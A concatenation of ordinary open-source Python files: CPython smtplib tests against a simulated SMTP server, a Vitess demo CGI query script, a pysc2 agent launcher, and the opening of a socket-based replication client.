            self.push(self.mail_response)
            if self.disconnect:
                self.close_when_done()

    def smtp_RCPT(self, arg):
        if self.rcpt_response is None:
            super().smtp_RCPT(arg)
            return
        # Canned mode: reply with the next scripted response in sequence.
        self.rcpt_count += 1
        self.push(self.rcpt_response[self.rcpt_count-1])

    def smtp_RSET(self, arg):
        # Count RSETs so tests can assert whether the client issued one.
        self.rset_count += 1
        super().smtp_RSET(arg)

    def smtp_DATA(self, arg):
        if self.data_response is None:
            super().smtp_DATA(arg)
        else:
            self.push(self.data_response)

    def handle_error(self):
        # Let exceptions propagate so test failures surface immediately.
        raise
class SimSMTPServer(smtpd.SMTPServer):
    """smtpd.SMTPServer variant that records message addresses and can
    advertise extra ESMTP features through SimSMTPChannel."""

    channel_class = SimSMTPChannel

    def __init__(self, *args, **kw):
        self._extra_features = []
        self._addresses = {}
        smtpd.SMTPServer.__init__(self, *args, **kw)

    def handle_accepted(self, conn, addr):
        # Hand every accepted connection to our feature-aware channel and
        # keep a reference so tests can script its responses.
        self._SMTPchannel = self.channel_class(
            self._extra_features, self, conn, addr,
            decode_data=self._decode_data)

    def process_message(self, peer, mailfrom, rcpttos, data):
        # Just remember the envelope addresses; tests inspect them later.
        self._addresses.update({'from': mailfrom, 'tos': rcpttos})

    def add_feature(self, feature):
        self._extra_features.append(feature)

    def handle_error(self):
        # Let exceptions propagate so test failures surface immediately.
        raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
    """Issue 5713: a 421 reply to MAIL closes the connection without RSET."""
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
    smtp.noop()
    self.serv._SMTPchannel.mail_response = '421 closing connection'
    with self.assertRaises(smtplib.SMTPSenderRefused):
        smtp.sendmail('John', 'Sally', 'test message')
    self.assertIsNone(smtp.sock)
    # close, not rset, must have been called.
    self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
    """A 421 reply to one RCPT aborts the send and reports that recipient."""
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
    smtp.noop()
    # Second recipient triggers the 421; first is accepted normally.
    self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
    with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
        smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
    self.assertIsNone(smtp.sock)
    self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
    # Only the recipient that got the 421 is reported as refused.
    self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
    """A 421 reply to DATA closes the connection; no RCPTs are retried."""
    class MySimSMTPChannel(SimSMTPChannel):
        def found_terminator(self):
            # Fail only the DATA phase; everything else behaves normally.
            if self.smtp_state == self.DATA:
                self.push('421 closing')
            else:
                super().found_terminator()
    self.serv.channel_class = MySimSMTPChannel
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
    smtp.noop()
    with self.assertRaises(smtplib.SMTPDataError):
        smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
    self.assertIsNone(smtp.sock)
    self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
    """Requesting SMTPUTF8 raises when the server lacks the extension."""
    smtp = smtplib.SMTP(
        HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.ehlo()
    self.assertTrue(smtp.does_esmtp)
    self.assertFalse(smtp.has_extn('smtputf8'))
    self.assertRaises(
        smtplib.SMTPNotSupportedError,
        smtp.sendmail,
        'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
    self.assertRaises(
        smtplib.SMTPNotSupportedError,
        smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
    """Non-ASCII envelope addresses fail to encode without SMTPUTF8."""
    smtp = smtplib.SMTP(
        HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
    self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
    """send_message raises SMTPNotSupportedError for non-ASCII addresses
    when the server does not advertise SMTPUTF8.
    """
    # This test is located here and not in the SMTPUTF8SimTests
    # class because it needs a "regular" SMTP server to work
    msg = EmailMessage()
    msg['From'] = "Páolo <főo@bar.com>"
    msg['To'] = 'Dinsdale'
    msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
    smtp = smtplib.SMTP(
        HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    with self.assertRaises(smtplib.SMTPNotSupportedError):
        smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
    """Only the addr-spec, not the display name, goes into the envelope."""
    smtp = smtplib.SMTP(
        HOST, self.port, local_hostname='localhost', timeout=3
    )
    self.addCleanup(smtp.close)
    message = EmailMessage()
    message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
    message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
    self.assertDictEqual(smtp.send_message(message), {})
    # The server saw bare addresses, without the display names.
    self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
    self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
    """SimSMTPServer variant whose channels advertise SMTPUTF8 and 8BITMIME."""

    def __init__(self, *args, **kw):
        # The base SMTP server turns these on automatically, but our test
        # server is set up to munge the EHLO response, so we need to provide
        # them as well. And yes, the call is to SMTPServer not SimSMTPServer.
        self._extra_features = ['SMTPUTF8', '8BITMIME']
        smtpd.SMTPServer.__init__(self, *args, **kw)

    def handle_accepted(self, conn, addr):
        # Hand every accepted connection to the feature-munging channel.
        self._SMTPchannel = self.channel_class(
            self._extra_features, self, conn, addr,
            decode_data=self._decode_data,
            enable_SMTPUTF8=self.enable_SMTPUTF8,
        )

    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
                        rcpt_options=None):
        # Record everything so the tests can assert on what the server received.
        self.last_peer = peer
        self.last_mailfrom = mailfrom
        self.last_rcpttos = rcpttos
        self.last_message = data
        self.last_mail_options = mail_options
        self.last_rcpt_options = rcpt_options
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPUTF8SimTests(unittest.TestCase):
    """Tests against a simulated server that advertises SMTPUTF8/8BITMIME."""

    maxDiff = None

    def setUp(self):
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Pick a random unused port by passing 0 for the port number
        self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
                                      decode_data=False,
                                      enable_SMTPUTF8=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()

        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        self.thread.join()

    def test_test_server_supports_extensions(self):
        """Sanity check: the simulated server really advertises smtputf8."""
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        smtp.ehlo()
        self.assertTrue(smtp.does_esmtp)
        self.assertTrue(smtp.has_extn('smtputf8'))

    def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
        """sendmail() passes unicode envelope addresses through with SMTPUTF8."""
        m = '¡a test message containing unicode!'.encode('utf-8')
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        smtp.sendmail('Jőhn', 'Sálly', m,
                      mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
        self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
        self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
        self.assertEqual(self.serv.last_message, m)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])

    def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
        """mail()/rcpt()/data() accept unicode when SMTPUTF8 is requested."""
        m = '¡a test message containing unicode!'.encode('utf-8')
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        smtp.ehlo()
        self.assertEqual(
            smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
            (250, b'OK'))
        self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
        self.assertEqual(smtp.data(m), (250, b'OK'))
        self.assertEqual(self.serv.last_mailfrom, 'Jő')
        self.assertEqual(self.serv.last_rcpttos, ['János'])
        self.assertEqual(self.serv.last_message, m)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])

    def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
        """send_message() automatically requests SMTPUTF8 for non-ASCII addrs."""
        msg = EmailMessage()
        msg['From'] = "Páolo <főo@bar.com>"
        msg['To'] = 'Dinsdale'
        msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
        # XXX I don't know why I need two \n's here, but this is an existing
        # bug (if it is one) and not a problem with the new functionality.
        msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
        # XXX smtpd converts received /r/n to /n, so we can't easily test that
        # we are successfully sending /r/n :(.
        expected = textwrap.dedent("""\
            From: Páolo <főo@bar.com>
            To: Dinsdale
            Subject: Nudge nudge, wink, wink \u1F609
            Content-Type: text/plain; charset="utf-8"
            Content-Transfer-Encoding: 8bit
            MIME-Version: 1.0

            oh là là, know what I mean, know what I mean?
            """)
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        self.assertEqual(smtp.send_message(msg), {})
        self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
        self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
        self.assertEqual(self.serv.last_message.decode(), expected)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
    """Channel accepting AUTH PLAIN only via the RFC 4954 initial-response."""

    def smtp_AUTH(self, arg):
        # RFC 4954's AUTH command allows for an optional initial-response.
        # Not all AUTH methods support this; some require a challenge. AUTH
        # PLAIN does those, so test that here. See issue #15014.
        args = arg.split()
        if args[0].lower() == 'plain':
            if len(args) == 2:
                # AUTH PLAIN <initial-response> with the response base 64
                # encoded. Hard code the expected response for the test.
                if args[1] == EXPECTED_RESPONSE:
                    self.push('235 Ok')
                    return
        # Wrong mechanism, or missing/incorrect initial response.
        self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
    """SimSMTPServer whose channels implement AUTH with an initial-response."""
    channel_class = SimSMTPAUTHInitialResponseChannel
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
    """Tests for AUTH PLAIN using the initial-response form (issue #15014)."""

    def setUp(self):
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Pick a random unused port by passing 0 for the port number
        self.serv = SimSMTPAUTHInitialResponseServer(
            (HOST, 0), ('nowhere', -1), decode_data=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()

        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        self.thread.join()

    def testAUTH_PLAIN_initial_response_login(self):
        """login() succeeds using AUTH PLAIN with an initial response."""
        self.serv.add_feature('AUTH PLAIN')
        smtp = smtplib.SMTP(HOST, self.port,
                            local_hostname='localhost', timeout=15)
        smtp.login('psu', 'doesnotexist')
        smtp.close()

    def testAUTH_PLAIN_initial_response_auth(self):
        """auth() with auth_plain yields 235 via the initial-response form."""
        self.serv.add_feature('AUTH PLAIN')
        smtp = smtplib.SMTP(HOST, self.port,
                            local_hostname='localhost', timeout=15)
        smtp.user = 'psu'
        smtp.password = 'doesnotexist'
        code, response = smtp.auth('plain', smtp.auth_plain)
        smtp.close()
        self.assertEqual(code, 235)
# Run the whole test module when executed directly.
if __name__ == '__main__':
    unittest.main()
|
data.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The Vitess Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module allows you to bring up and tear down keyspaces."""
import cgi
import decimal
import json
import subprocess
import threading
import time
from vtdb import keyrange
from vtdb import vtgate_client
# TODO(sougou): remove this import once the deps are fixed
import google.protobuf
from vtdb import grpc_vtgate_client # pylint: disable=unused-import
def exec_query(conn, title, query, response, keyspace=None, kr=None):
    """Execute `query` on `conn` and record the outcome under response[title].

    A keyrange `kr` selects a v2 shard-targeted cursor (for debug display);
    otherwise a writable v3 cursor is used.  Failures are captured into the
    response dict rather than raised, so the CGI page always renders.
    """
    if kr:
        # v2 cursor addressing an individual shard directly, for debug display.
        cur = conn.cursor(
            tablet_type="master", keyspace=keyspace,
            keyranges=[keyrange.KeyRange(kr)])
    else:
        # v3 cursor: routing is automated.
        cur = conn.cursor(
            tablet_type="master", keyspace=keyspace, writable=True)
    try:
        if not query or query == "undefined":
            return
        if query.startswith("select"):
            cur.execute(query, {})
        else:
            # Writes need an explicit transaction.
            cur.begin()
            cur.execute(query, {})
            cur.commit()
        result = {
            "title": title,
            "description": cur.description,
            "rowcount": cur.rowcount,
            "lastrowid": cur.lastrowid,
            "results": cur.results,
        }
        response[title] = result
        cur.close()
    except Exception as exc:  # pylint: disable=broad-except
        response[title] = {
            "title": title,
            "error": str(exc),
        }
        cur.rollback()
        cur.close()
def capture_log(port, queries):  # pylint: disable=missing-docstring
    """Tail vtgate's /debug/querylog via curl, appending each SQL text to `queries`.

    Returns the curl Popen handle so the caller can terminate() it.
    """
    p = subprocess.Popen(
        ["curl", "-s", "-N", "http://localhost:%d/debug/querylog" % port],
        stdout=subprocess.PIPE)
    def collect():
        # Sentinel "" works because this is Python 2 text-mode output.
        for line in iter(p.stdout.readline, ""):
            # Column 12 of the tab-separated log line holds the quoted SQL.
            query = line.split("\t")[12].strip('"')
            if not query:
                continue
            queries.append(query)
    t = threading.Thread(target=collect)
    t.daemon = True
    t.start()
    return p
def main():
    """CGI entry point: run the user query, then dump all demo tables as JSON."""
    print "Content-Type: application/json\n"
    try:
        conn = vtgate_client.connect("grpc", "localhost:12346", 10.0)

        args = cgi.FieldStorage()
        query = args.getvalue("query")
        response = {}

        try:
            queries = []
            # Tail the vtgate query log while the statement runs so the
            # routed queries can be shown alongside the results.
            # NOTE(review): if capture_log() itself raises, `stats` is unbound
            # in the finally clause — confirm intended.
            stats = capture_log(12345, queries)
            time.sleep(0.25)
            exec_query(conn, "result", query, response)
        finally:
            stats.terminate()
            time.sleep(0.25)
            response["queries"] = queries

        # user table
        exec_query(
            conn, "user0",
            "select * from user", response, keyspace="user", kr="-80")
        exec_query(
            conn, "user1",
            "select * from user", response, keyspace="user", kr="80-")

        # user_extra table
        exec_query(
            conn, "user_extra0",
            "select * from user_extra", response, keyspace="user", kr="-80")
        exec_query(
            conn, "user_extra1",
            "select * from user_extra", response, keyspace="user", kr="80-")

        # music table
        exec_query(
            conn, "music0",
            "select * from music", response, keyspace="user", kr="-80")
        exec_query(
            conn, "music1",
            "select * from music", response, keyspace="user", kr="80-")

        # music_extra table
        exec_query(
            conn, "music_extra0",
            "select * from music_extra", response, keyspace="user", kr="-80")
        exec_query(
            conn, "music_extra1",
            "select * from music_extra", response, keyspace="user", kr="80-")

        # name_info table
        exec_query(
            conn, "name_info0",
            "select * from name_info", response, keyspace="user", kr="-80")
        exec_query(
            conn, "name_info1",
            "select * from name_info", response, keyspace="user", kr="80-")

        # music_keyspace_idx table
        exec_query(
            conn, "music_keyspace_idx0",
            "select music_id, hex(keyspace_id) from music_keyspace_idx", response, keyspace="user", kr="-80")
        exec_query(
            conn, "music_keyspace_idx1",
            "select music_id, hex(keyspace_id) from music_keyspace_idx", response, keyspace="user", kr="80-")

        # lookup tables
        exec_query(
            conn, "user_seq", "select * from user_seq", response,
            keyspace="lookup", kr="-")
        exec_query(
            conn, "music_seq", "select * from music_seq", response,
            keyspace="lookup", kr="-")
        exec_query(
            conn, "name_keyspace_idx", "select name, hex(keyspace_id) from name_keyspace_idx", response,
            keyspace="lookup", kr="-")

        print json.dumps(response, default=decimal_default)
    except Exception as e:  # pylint: disable=broad-except
        print json.dumps({"error": str(e)})
def decimal_default(obj):
    """Provide json-encodable conversion for decimal.Decimal type.

    json encoding fails on decimal.Decimal.  This function converts the
    decimal into a float object, which json knows how to encode.
    """
    if not isinstance(obj, decimal.Decimal):
        raise TypeError
    return float(obj)
# CGI scripts are executed directly by the web server.
if __name__ == "__main__":
    main()
|
agent.py | #!/usr/bin/python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run an agent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import threading
from future.builtins import range # pylint: disable=redefined-builtin
from pysc2 import maps
from pysc2.env import available_actions_printer
from pysc2.env import run_loop
from pysc2.env import sc2_env
from pysc2.lib import stopwatch
from pysc2.lib import app
import gflags as flags
FLAGS = flags.FLAGS
# Rendering / feature-layer options.
flags.DEFINE_bool("render", True, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 84,
                     "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64,
                     "Resolution for minimap feature layers.")

# Episode / stepping control.
flags.DEFINE_integer("max_agent_steps", 2500, "Total agent steps.")
flags.DEFINE_integer("game_steps_per_episode", 0, "Game steps per episode.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")

# Agent and opponent configuration.
flags.DEFINE_string("agent", "pysc2.agents.random_agent.RandomAgent",
                    "Which agent to run")
flags.DEFINE_enum("agent_race", None, sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", None, sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", None, sc2_env.difficulties.keys(),
                  "Bot's strength.")

# Diagnostics and parallelism.
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_integer("parallel", 1, "How many instances to run in parallel.")

flags.DEFINE_bool("save_replay", False, "Whether to save a replay at the end.")

flags.DEFINE_string("map", None, "Name of a map to use.")
flags.mark_flag_as_required("map")
def run_thread(agent_cls, map_name, visualize):
    """Run one agent in its own SC2 environment for FLAGS.max_agent_steps."""
    with sc2_env.SC2Env(
        map_name=map_name,
        agent_race=FLAGS.agent_race,
        bot_race=FLAGS.bot_race,
        difficulty=FLAGS.difficulty,
        step_mul=FLAGS.step_mul,
        game_steps_per_episode=FLAGS.game_steps_per_episode,
        screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
        minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
        visualize=visualize) as env:
        # Wrap the env so the available actions are printed each step.
        env = available_actions_printer.AvailableActionsPrinter(env)
        agent = agent_cls()
        run_loop.run_loop([agent], env, FLAGS.max_agent_steps)
        if FLAGS.save_replay:
            env.save_replay(agent_cls.__name__)
def main(unused_argv):
    """Run an agent."""
    # Optional profiling/tracing of pysc2 internals.
    stopwatch.sw.enabled = FLAGS.profile or FLAGS.trace
    stopwatch.sw.trace = FLAGS.trace

    maps.get(FLAGS.map)  # Assert the map exists.

    # Resolve the agent class from its dotted "module.Class" path.
    agent_module, agent_name = FLAGS.agent.rsplit(".", 1)
    agent_cls = getattr(importlib.import_module(agent_module), agent_name)

    threads = []
    # Extra instances run headless in background threads; the last instance
    # runs in this thread so it can render.
    for _ in range(FLAGS.parallel - 1):
        t = threading.Thread(target=run_thread, args=(agent_cls, FLAGS.map, False))
        threads.append(t)
        t.start()

    run_thread(agent_cls, FLAGS.map, FLAGS.render)

    for t in threads:
        t.join()

    if FLAGS.profile:
        print(stopwatch.sw)
def entry_point():  # Needed so setup.py scripts work.
    app.run(main)


# Also runnable directly as a script.
if __name__ == "__main__":
    app.run(main)
|
client.py | #!/bin/env python
# import proto_message as message
import socket
import os
import sys
import struct
import threading
import select
import time
import socks
# import time
import request_pb2
from config import client_address, \
client_id, \
RL, \
client_logger, \
config_general
# N, TOR_SOCKSPORT
# Set by the receiver thread once all expected responses have arrived.
kill_flag = False
# Wall-clock time when the send loop starts; read by recv_response().
start_time = 0
def recv_response(n):
    """Listen for replica responses and set `kill_flag` when all have arrived.

    Accepts connections on the client's configured port, parses each framed
    protobuf Request, and counts responses.  Once n * len(RL) responses are
    seen, records the total elapsed time (relative to the module-level
    `start_time`) and flips `kill_flag` so the main thread can exit.
    """
    global kill_flag
    count = 0
    print("RECEIVING")
    s = socket.socket()
    p = select.epoll()
    ip, port = client_address
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.setblocking(0)
    s.bind(('0.0.0.0', port))
    s.listen(50)
    client_logger.info("Client [%s] listening on port %s" % (client_id, port))
    client_logger.info("Client IP: %s" % ip)
    p.register(s)
    client_msg = "[%s] SEQUENCE: 0 REPLICA: 0 START\n" % (time.time())
    client_logger.debug(client_msg)
    while True:
        events = p.poll()
        client_logger.info("Current events queue: %s" % events)
        for fd, event in events:
            c, addr = s.accept()
            r = c.recv(4096)
            # First 4 bytes are the length prefix; the protobuf follows.
            req = request_pb2.Request()
            req.ParseFromString(r[4:])
            client_msg = "[%s] SEQUENCE: %s - REPLICA: %s\n" % \
                (time.time(), req.inner.seq, req.inner.id)
            client_logger.info(client_msg)
            count += 1
            if req.inner.seq % 100 == 0:
                # BUG FIX: format string had one placeholder but two args,
                # which raised TypeError here.
                client_logger.debug(
                    "CLIENT [%s] SEQUENCE: %s" % (client_id, req.inner.seq))
            if count == n * len(RL):
                kill_flag = True
                # BUG FIX: end_time was never defined and the format tuple
                # was wrong (two placeholders, one value).
                end_time = time.time()
                client_logger.debug(
                    'CLIENT [%s] total time spent with chain: %s' %
                    (client_id, end_time - start_time))
# ---- script entry: load pre-generated requests and replay them to replicas ----

# Number of expected responses per replica (default 50).
if len(sys.argv) == 2:
    n = int(sys.argv[1])
else:
    n = 50

# Receiver runs in the background; daemon so exit isn't blocked.
